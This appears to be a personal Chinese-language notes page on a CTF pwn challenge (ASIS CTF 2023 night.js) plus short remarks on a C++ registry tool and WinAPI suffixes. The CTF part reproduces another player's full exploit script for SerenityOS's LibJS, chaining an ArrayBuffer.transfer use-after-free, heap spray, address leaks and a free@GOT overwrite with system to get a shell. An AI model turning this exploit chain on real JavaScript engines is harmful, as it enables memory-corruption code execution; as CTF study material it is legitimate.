avatar
giacomo
  1. Nightjs
    1. File to short
  2. 写一个 cpp 的小东西
  3. Winapi 函数后缀

Nightjs

pathlib 文件系统路径,支持多平台

File to short

可能是没有权限

root@594f7280f663:/home/pwn# LD_LIBRARY_PATH=/libjs/ timeout 3 ./js
./js: error while loading shared libraries: /libjs/liblagom-js.so.0: file too short

有一个git diff结果文件

原版在这里 serenity/Userland/Utilities/js.cpp 看不懂cpp

偷来 crazyman 的 wp

buffer_array = []
spray_array = []

// for(let i = 0; i < 0x10; i++) {
//     spray_array.push(new ArrayBuffer(0x50))
// }

for(let i = 0; i < 0x30; i++) {
    // spray_array.push(new ArrayBuffer(0x50))
    buffer_array.push(new ArrayBuffer(0x120))
}
buffer = buffer_array[0x1f]
view = new BigUint64Array(buffer)

view[0] = 0n;
view[1] = 1n;
view[2] = 2n;
view[3] = 3n;
view[4] = 0x100n;
view[5] = 1n;
view[6] = 1n;

buffer2 = buffer.transfer(0x20)
console.log(buffer2.byteLength)

for(let i = 0; i < 0x30; i++) {
    spray_array.push(new ArrayBuffer(0x160))
}
for(let i = 0; i < 0x30; i++) {
    v = new BigUint64Array(spray_array[i])
    v[0] = 16653634245063215n
}
view2 = new BigUint64Array(buffer2)
liblagomjsbase = view2[8]-0x67dda8n
heapbase = view2[10]
console.log("leak liblagom-js: "+view2[8].toString(16))
console.log("leak heap: "+heapbase.toString(16))

view2[16] = liblagomjsbase
// test arbitrary read
v = new BigUint64Array(spray_array[0])
console.log(v[0].toString(16))

freegot = liblagomjsbase+0x69b420n
view2[16] = freegot
libcbase = v[0]-0xa8780n
system = libcbase+0x55230n
console.log(freegot.toString(16))
console.log(libcbase.toString(16))

v[0] = system; //libcbase+0x1105f2n // overwrite free@got in liblagom-js
view[0] = 0n;
view[1] = 1n;
view[2] = 2n;
view[3] = 3n;
view[4] = 0x100n;
view[5] = 1n;
view[6] = 1n;

// spray_array = vshell
view2[16] = libcbase+0x1c040cn//l29400045130965551n


shell = new ArrayBuffer(0x1000)

Asis CTF 2023 - night.js exploit

冲浪发现学长 blog TCTF-final-Promise-JSpwn题解 | A1ex’s Blog

写一个 cpp 的小东西

想写一个修改注册表的小玩意,但是 winapi 的那些名词不清不楚的,直到看到了这个才明白

如果有 ERROR_ACCESS_DENIED 那就是没用管理员身份运行

写好了 commandline 的格式,感觉不如直接写 reg 文件…

Winapi 函数后缀